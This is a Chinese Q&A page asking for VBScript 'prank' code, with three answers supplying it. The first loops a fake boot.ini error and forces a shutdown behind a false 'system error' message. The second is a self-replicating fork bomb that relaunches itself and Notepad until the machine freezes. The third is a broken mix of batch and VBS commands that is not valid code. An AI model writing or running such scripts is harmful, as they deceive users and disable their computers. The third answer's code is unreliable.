VBS整人代码问题

2024-11-22 21:35:31
推荐回答(3个)
回答(1):

do
Msgbox "There is not found C:/WINDOWS/system32/boot.ini",48,"Error!"
set ws=createobject("wscript.shell")
ws.run "shutdown -s -t 100 -c " &chr(34)&" 温謦提醒!" &chr(13)&chr(13)&" 系统错误,需要重启!"&chr(34)
loop

请三思而后行!

回答(2):

发个特整人的东西给你看看,不仅特整人,还非常简单,仅仅6行

set s=createobject("wscript.shell")
lsfile=wscript.scriptfullname '获得自己的名称
do '死循环
s.run lsfile '自己运行自己
s.run "notepad" '运行记事本
loop '几秒就死机,哈

回答(3):

do
Msgbox"There is not found C:/WINDOWS/system32/boot.ini"
start CMD.exe
run "shutdown -s -t 100"
loop